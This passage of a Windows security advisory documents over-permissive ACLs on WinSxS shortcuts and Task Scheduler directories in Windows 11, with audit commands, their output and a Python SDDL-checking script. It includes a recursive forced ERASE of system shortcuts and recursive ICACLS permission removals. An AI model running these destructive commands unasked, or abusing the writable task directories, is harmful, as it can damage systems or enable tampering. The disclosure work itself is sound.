C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.26100.4202_none_37e1156650eaa088\Resource Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.26100.5074_none_37fd8b9a50d44a70\Performance Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.26100.5074_none_37fd8b9a50d44a70\Resource Monitor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.26100.4343_none_c46322c03ba8c055\RecoveryDrive.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.26100.5074_none_c4867e803b8dcf4f\RecoveryDrive.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.26100.4202_none_90060c9f8bcf570f\Registry Editor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.26100.5074_none_902282d38bb900f7\Registry Editor.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-s..ment-policytools-ex_31bf3856ad364e35_10.0.26100.1882_none_f4fdc9eef135ca34\Security Configuration Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-s..ment-policytools-ex_31bf3856ad364e35_10.0.26100.1_none_5652fdfea9a23958\Security Configuration Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)
C:\Windows\WinSxS\amd64_microsoft-windows-s..ment-policytools-ex_31bf3856ad364e35_10.0.26100.5074_none_f553230cf0f5f933\Security Configuration
Management.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_10.0.26100.1882_none_6b0256f4f5db1044\services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_10.0.26100.1_none_cc578b04ae477f68\services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_10.0.26100.5074_none_6b57b012f59b3f43\services.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.26100.4202_none_e9b3a4cfd10e4076\Remote Desktop Connection.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.26100.5074_none_e9d01b03d0f7ea5e\Remote Desktop Connection.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_networking-mpssvc-shortcut_31bf3856ad364e35_10.0.26100.1882_none_20f5695abce558a4\Windows Defender Firewall with Advanced Security.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_networking-mpssvc-shortcut_31bf3856ad364e35_10.0.26100.1_none_824a9d6a7551c7c8\Windows Defender Firewall with Advanced Security.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) 
C:\Windows\WinSxS\amd64_networking-mpssvc-shortcut_31bf3856ad364e35_10.0.26100.5074_none_214ac278bca587a3\Windows Defender Firewall with Advanced Security.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_taskschedulersettings_31bf3856ad364e35_10.0.26100.1882_none_e689781ab47d0fe7\Task Scheduler.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_taskschedulersettings_31bf3856ad364e35_10.0.26100.1_none_47deac2a6ce97f0b\Task Scheduler.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\amd64_taskschedulersettings_31bf3856ad364e35_10.0.26100.5074_none_e6ded138b43d3ee6\Task Scheduler.lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\wow64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.3624_none_ea527a59222d572d\ODBC Data Sources (32-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC) C:\Windows\WinSxS\wow64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.26100.5074_none_ea985f1f21f82888\ODBC Data Sources (32-bit).lnk S-1-5-21-1717989741-1660040995-2455016376-1002:(I)(DE,DC) S-1-5-21-1717989741-1660040995-2455016376-1000:(I)(DE,DC)OUCH: multiple unprivileged user accounts created during setup of this installation of Windows 11 25H2 are granted
DELETE and
FILE_DELETE_CHILD access to 60
shortcuts stored underneath %SystemRoot%\WinSxS\!
(Optional) Delete the shortcuts in the repository:
ERASE /F /Q /S "%SystemRoot%\WinSxS\*.lnk"
Remove the ACE (A;OICIIO;DTSD;;;LA) for the local Administrator account and all dangerous ACEs like (A;OICIIO;DTSD;;;S-1-5-21-‹digits›-‹digits›-‹digits›-1000) for the local user accounts from the shortcuts in the repository.
Logon to the first user account created during Windows setup and start the Command Processor Cmd.exe elevated, then execute the following command line:
ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /Remove:g "%USERDOMAIN%\Administrator" /Remove:g "%USERDOMAIN%\%USERNAME%" /Remove:g "%USERDOMAIN%\‹account›" /Remove:g *S-1-5-21-‹digits›-‹digits›-‹digits›-1000 /Remove:g *S-1-5-21-‹digits›-‹digits›-‹digits›-… /T
Successfully processed … files; Failed processing 0 files
The MSKB article 939039 provides a description of the scheduled tasks in Windows Vista.
The documentation for the Schtasks command line utility shipped with Windows XP states in its last Remarks section:
- The user must be a member of the Administrators group on the computer that the command affects.
The documentation for the Schtasks command line utility shipped with Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1 and Windows Server 2012 R2 states in its first Remarks section:
- Permissions for schtasks
  You must have permission to run the command. Any user can schedule a task on the local computer, and they can view and change the tasks that they scheduled. Members of the Administrators group can schedule, view, and change all tasks on the local computer.
Before Windows Vista, Scheduled Tasks used the directory %WINDIR%\Tasks\ for .job files and its log file schedlgu.txt.
In Windows Vista and later versions of Windows NT the Task Scheduler uses the directory %SystemRoot%\System32\Tasks\ – on 64-bit editions of Windows NT also the directory %SystemRoot%\SysWoW64\Tasks\ – for text files in XML format, but without file extension, and without proper protection: for almost 19 (in words: nineteen) years unprivileged users have been able to overwrite and delete some of them!
Logon to an arbitrary (unprivileged) standard user account and start the Command Processor Cmd.exe, then execute the following command lines:
CACLS.EXE "%SystemRoot%\Tasks" /S
ICACLS.EXE "%SystemRoot%\Tasks"
DIR /A /S "%SystemRoot%\System32\Tasks"
CACLS.EXE "%SystemRoot%\System32\Tasks" /S
ICACLS.EXE "%SystemRoot%\System32\Tasks"
DIR /A /S "%SystemRoot%\SysWoW64\Tasks"
CACLS.EXE "%SystemRoot%\SysWoW64\Tasks" /S
ICACLS.EXE "%SystemRoot%\SysWOW64\Tasks"
Note: the command lines can be copied and pasted as block into a Command Processor window.
C:\windows\Tasks "D:PAI(A;;0x1200ab;;;AU)(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;FA;;;BA)(A;OICIIO;GA;;;CO)"
C:\Windows\Tasks NT AUTHORITY\Authenticated Users:(RX,WD)
                 BUILTIN\Administrators:(F)
                 BUILTIN\Administrators:(OI)(CI)(IO)(F)
                 NT AUTHORITY\SYSTEM:(F)
                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                 CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
 Volume in drive C: has no label.
 Volume Serial Number is 1957-0427

File Not Found
C:\windows\System32\Tasks "D:PAI(A;CI;FA;;;BA)(A;OI;0x1f019f;;;BA)(A;CI;FA;;;SY)(A;OI;0x1f019f;;;SY)(A;CI;FW;;;AU)(A;CI;FW;;;NS)(A;CI;FW;;;LS)(A;OICIIO;FA;;;CO)"
C:\Windows\System32\Tasks BUILTIN\Administrators:(CI)(F)
                          BUILTIN\Administrators:(OI)(R,W,D,WDAC,WO)
                          NT AUTHORITY\SYSTEM:(CI)(F)
                          NT AUTHORITY\SYSTEM:(OI)(R,W,D,WDAC,WO)
                          NT AUTHORITY\Authenticated Users:(CI)(W,Rc)
                          NT AUTHORITY\NETWORK SERVICE:(CI)(W,Rc)
                          NT AUTHORITY\LOCAL SERVICE:(CI)(W,Rc)
                          CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
 Volume in drive C: has no label.
 Volume Serial Number is 1957-0427

File Not Found
C:\windows\SysWoW64\Tasks "D:PAI(A;CI;FA;;;BA)(A;OI;0x1f019f;;;BA)(A;CI;FA;;;SY)(A;OI;0x1f019f;;;SY)(A;CI;FW;;;AU)(A;CI;FW;;;NS)(A;CI;FW;;;LS)(A;OICIIO;FA;;;CO)"
C:\Windows\SysWOW64\Tasks BUILTIN\Administrators:(CI)(F)
                          BUILTIN\Administrators:(OI)(R,W,D,WDAC,WO)
                          NT AUTHORITY\SYSTEM:(CI)(F)
                          NT AUTHORITY\SYSTEM:(OI)(R,W,D,WDAC,WO)
                          NT AUTHORITY\Authenticated Users:(CI)(W,Rc)
                          NT AUTHORITY\NETWORK SERVICE:(CI)(W,Rc)
                          NT AUTHORITY\LOCAL SERVICE:(CI)(W,Rc)
                          CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
Oops: all (unprivileged) users are granted FILE_LIST_SUBDIRECTORY, FILE_ADD_FILE, FILE_READ_EA, FILE_TRAVERSE, FILE_READ_ATTRIBUTES, READ_CONTROL and SYNCHRONIZE access for the directory %SystemRoot%\Tasks\ – they can create files there, can enumerate them all, including those created by other users, and can delete their own files.
OOPS: all (unprivileged) users are granted FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, FILE_WRITE_EA, FILE_WRITE_ATTRIBUTES, READ_CONTROL and SYNCHRONIZE access for the directories %SystemRoot%\System32\Tasks\, %SystemRoot%\SysWoW64\Tasks\ and all their subdirectories, independent of their owner – they can create files and subdirectories anywhere, can enumerate their own subdirectories, including the files (and subdirectories) created there by other users, and can delete all files and empty subdirectories, including those created by other users, in their own subdirectories.
OUCH⁰: thanks to the inheritable ACE (A;CI;FW;;;AU) of the directories %SystemRoot%\System32\Tasks\ and %SystemRoot%\SysWoW64\Tasks\, (unprivileged) users who guess the (of course rather unlikely) name of a subdirectory like Microsoft created by careless and clueless developers can enumerate and remove such subdirectories completely!
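The SDDL strings that CACLS /S prints above are easier to audit by machine than by eye. The following decoder is an added example (not code from this page or from Microsoft): it parses a DACL, names the access-mask bits, and flags allow ACEs that grant write or delete rights to trustees other than Administrators and SYSTEM. The sample DACLs are the two quoted above for the Tasks directories plus one ACE of the kind the WinSxS shortcuts carry; the PRIVILEGED set and the WRITE_BITS selection are this example's own assumptions about what counts as expected access.

```python
"""Decode SDDL DACLs as printed by CACLS /S and flag ACEs that hand write or
delete access to unprivileged trustees.  Added example: the sample DACLs are
copied from the listings on this page; bit names follow winnt.h, the
PRIVILEGED set is this example's assumption."""
import re
from dataclasses import dataclass

# Access-mask bits for file system objects; "/" separates the file and the
# directory name of the same bit.
FILE_RIGHTS = {
    0x00000001: "FILE_READ_DATA/FILE_LIST_DIRECTORY",
    0x00000002: "FILE_WRITE_DATA/FILE_ADD_FILE",
    0x00000004: "FILE_APPEND_DATA/FILE_ADD_SUBDIRECTORY",
    0x00000008: "FILE_READ_EA",
    0x00000010: "FILE_WRITE_EA",
    0x00000020: "FILE_EXECUTE/FILE_TRAVERSE",
    0x00000040: "FILE_DELETE_CHILD",
    0x00000080: "FILE_READ_ATTRIBUTES",
    0x00000100: "FILE_WRITE_ATTRIBUTES",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
    0x10000000: "GENERIC_ALL",
    0x20000000: "GENERIC_EXECUTE",
    0x40000000: "GENERIC_WRITE",
    0x80000000: "GENERIC_READ",
}
# SDDL two-letter rights tokens.  DT is bit 0x40, i.e. FILE_DELETE_CHILD on a
# file system object; FA/FR/FW/FX are the FILE_GENERIC_* groups.
SDDL_RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "DT": 0x00000040,
}
# Bits that let a trustee modify or remove the object or its children.
WRITE_BITS = (0x2 | 0x4 | 0x10 | 0x40 | 0x100 | 0x10000 | 0x40000 | 0x80000
              | 0x10000000 | 0x40000000)
# Trustees whose write access is expected (assumption).  CREATOR OWNER ACEs
# bind only to objects the trustee created itself, so they are skipped too.
PRIVILEGED = {"BA", "SY", "LA", "CO", "S-1-5-18", "S-1-5-32-544"}
# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")


@dataclass(frozen=True)
class Ace:
    ace_type: str  # "A" = access allowed, "D" = access denied
    flags: str     # e.g. "OICIIO" = OBJECT_INHERIT + CONTAINER_INHERIT + INHERIT_ONLY
    mask: int
    trustee: str   # SDDL alias such as "AU", or a textual SID


def parse_rights(token: str) -> int:
    """Rights field: a hex mask ('0x1f019f') or a run of two-letter tokens ('DTSD')."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    if len(token) % 2:
        raise ValueError(f"malformed rights token {token!r}")
    return sum(SDDL_RIGHTS[token[i:i + 2]] for i in range(0, len(token), 2))


def parse_dacl(sddl: str) -> list[Ace]:
    """Accepts 'D:PAI(...)(...)' as printed by CACLS /S, or a bare run of ACEs."""
    aces = [Ace(t, f, parse_rights(r), s) for t, f, r, _g, _ig, s in ACE_RE.findall(sddl)]
    if not aces:
        raise ValueError("no ACEs found in DACL")
    return aces


def describe(mask: int) -> list[str]:
    """Names of the access-mask bits set in mask, lowest bit first."""
    return [name for bit, name in FILE_RIGHTS.items() if mask & bit]


def is_privileged(trustee: str) -> bool:
    # RID 500 is the built-in Administrator account of the machine or domain.
    return trustee in PRIVILEGED or (trustee.startswith("S-1-5-21-") and trustee.endswith("-500"))


def risky_aces(sddl: str) -> list[Ace]:
    """Allow ACEs granting any WRITE_BITS right to a trustee that is not privileged."""
    return [a for a in parse_dacl(sddl)
            if a.ace_type == "A" and a.mask & WRITE_BITS and not is_privileged(a.trustee)]


# DACLs quoted on this page (CACLS /S output of the Tasks directories) and one
# ACE of the kind the affected WinSxS shortcuts carry (SID taken from the listing).
TASKS_DACL = ("D:PAI(A;;0x1200ab;;;AU)(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)"
              "(A;OICIIO;GA;;;SY)(A;;FA;;;BA)(A;OICIIO;GA;;;CO)")
SYSTEM32_TASKS_DACL = ("D:PAI(A;CI;FA;;;BA)(A;OI;0x1f019f;;;BA)(A;CI;FA;;;SY)(A;OI;0x1f019f;;;SY)"
                       "(A;CI;FW;;;AU)(A;CI;FW;;;NS)(A;CI;FW;;;LS)(A;OICIIO;FA;;;CO)")
LNK_ACE = "(A;OICIIO;DTSD;;;S-1-5-21-1717989741-1660040995-2455016376-1000)"

if __name__ == "__main__":
    for label, sddl in [("%SystemRoot%\\Tasks", TASKS_DACL),
                        ("%SystemRoot%\\System32\\Tasks", SYSTEM32_TASKS_DACL),
                        ("WinSxS\\*.lnk", LNK_ACE)]:
        for ace in risky_aces(sddl):
            print(f"{label}: {ace.trustee} [{ace.flags or '-'}] -> {', '.join(describe(ace.mask))}")
```

For the System32\Tasks DACL the report names exactly the three FW ACEs (Authenticated Users, NETWORK SERVICE, LOCAL SERVICE) whose rights the paragraphs above spell out; for %SystemRoot%\Tasks it is the single 0x1200ab ACE that carries FILE_ADD_FILE.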
Execute the following command line to enumerate all task files in the directories %SystemRoot%\System32\Tasks\, %SystemRoot%\SysWoW64\Tasks\ and all their subdirectories:
FOR /F "Delims=," %? IN ('SCHTASKS.EXE /QUERY /FO CSV ^| FIND.EXE "\"') DO @ECHO %SystemRoot%\System32\Tasks%~?
ERROR: No mapping between account names and security IDs was done.
C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual)
C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser
C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater
C:\Windows\System32\Tasks\Microsoft\Windows\Autochk\Proxy
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam
C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator
C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask
C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip
C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag
C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\Scheduled
C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector
C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver
C:\Windows\System32\Tasks\Microsoft\Windows\End Of Support\Notify1
C:\Windows\System32\Tasks\Microsoft\Windows\End Of Support\Notify1
C:\Windows\System32\Tasks\Microsoft\Windows\End Of Support\Notify2
C:\Windows\System32\Tasks\Microsoft\Windows\Location\Notifications
C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\WinSAT
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\mcupdate
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\OCURActivate
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\StartRecording
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath
C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\CorruptionDetector
C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector
C:\Windows\System32\Tasks\Microsoft\Windows\MobilePC\HotStart
C:\Windows\System32\Tasks\Microsoft\Windows\MUI\LPRemove
C:\Windows\System32\Tasks\Microsoft\Windows\Multimedia\SystemSoundsService
C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo
C:\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Background Synchronization
C:\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Logon Synchronization
C:\Windows\System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem
C:\Windows\System32\Tasks\Microsoft\Windows\RAC\RacTask
C:\Windows\System32\Tasks\Microsoft\Windows\RAC\RacTask
C:\Windows\System32\Tasks\Microsoft\Windows\Registry\RegIdleBackup
C:\Windows\System32\Tasks\Microsoft\Windows\Setup\EOSNotify
C:\Windows\System32\Tasks\Microsoft\Windows\Setup\EOSNotify
C:\Windows\System32\Tasks\Microsoft\Windows\Setup\EOSNotify
C:\Windows\System32\Tasks\Microsoft\Windows\Setup\EOSNotify2
C:\Windows\System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControls
C:\Windows\System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsMigration
C:\Windows\System32\Tasks\Microsoft\Windows\SideShow\AutoWake
C:\Windows\System32\Tasks\Microsoft\Windows\SideShow\GadgetManager
C:\Windows\System32\Tasks\Microsoft\Windows\SideShow\SessionAgent
C:\Windows\System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders
C:\Windows\System32\Tasks\Microsoft\Windows\SystemRestore\SR
C:\Windows\System32\Tasks\Microsoft\Windows\SystemRestore\SR
C:\Windows\System32\Tasks\Microsoft\Windows\Task Manager\Interactive
C:\Windows\System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict1
C:\Windows\System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict2
C:\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor
C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime
C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime
C:\Windows\System32\Tasks\Microsoft\Windows\WDI\ResolutionHost
C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting
C:\Windows\System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange
C:\Windows\System32\Tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary
C:\Windows\System32\Tasks\Microsoft\Windows\WindowsBackup\ConfigNotification
C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader
C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader
C:\Windows\System32\Tasks\Microsoft\Windows\Wininet\CacheTask
C:\Windows\System32\Tasks\WPD\SqmUpload_S-1-5-21-820728443-44925810-1835867902-1000
OUCH¹: contrary to the highlighted statements of their documentation cited above, the Schtasks command line utility runs with user privileges!
Run the command line from step 2 above on Windows 11 25H2 too:
FOR /F "Delims=," %? IN ('SCHTASKS.EXE /QUERY /FO CSV ^| FIND.EXE "\"') DO @ECHO %SystemRoot%\System32\Tasks%~?
C:\Windows\System32\Tasks\OneDrive Reporting Task-S-1-5-21-1717989741-1660040995-2455016376-1002 C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1717989741-1660040995-2455016376-1002 C:\Windows\System32\Tasks\OneDrive Startup Task-S-1-5-21-1717989741-1660040995-2455016376-1002 C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical C:\Windows\System32\Tasks\Microsoft\Windows\AccountHealth\RecoverabilityToastTask C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated) C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated) C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) C:\Windows\System32\Tasks\Microsoft\Windows\AppID\PolicyConverter C:\Windows\System32\Tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\MareBackup C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\SdbinstMergeDbTask C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\SdbinstMergeDbTask C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask C:\Windows\System32\Tasks\Microsoft\Windows\ApplicationData\appuriverifierdaily 
C:\Windows\System32\Tasks\Microsoft\Windows\ApplicationData\appuriverifierinstall C:\Windows\System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState C:\Windows\System32\Tasks\Microsoft\Windows\ApplicationData\DsSvcCleanup C:\Windows\System32\Tasks\Microsoft\Windows\AppListBackup\Backup C:\Windows\System32\Tasks\Microsoft\Windows\AppListBackup\BackupNonMaintenance C:\Windows\System32\Tasks\Microsoft\Windows\AppxDeploymentClient\Pre-staged app cleanup C:\Windows\System32\Tasks\Microsoft\Windows\Autochk\Proxy C:\Windows\System32\Tasks\Microsoft\Windows\BitLocker\BitLocker Encrypt All Drives C:\Windows\System32\Tasks\Microsoft\Windows\BitLocker\BitLocker MDM policy Refresh C:\Windows\System32\Tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask C:\Windows\System32\Tasks\Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask C:\Windows\System32\Tasks\Microsoft\Windows\capabilityaccessmanager\maintenancetasks C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam C:\Windows\System32\Tasks\Microsoft\Windows\Chkdsk\ProactiveScan C:\Windows\System32\Tasks\Microsoft\Windows\Chkdsk\SyspartRepair 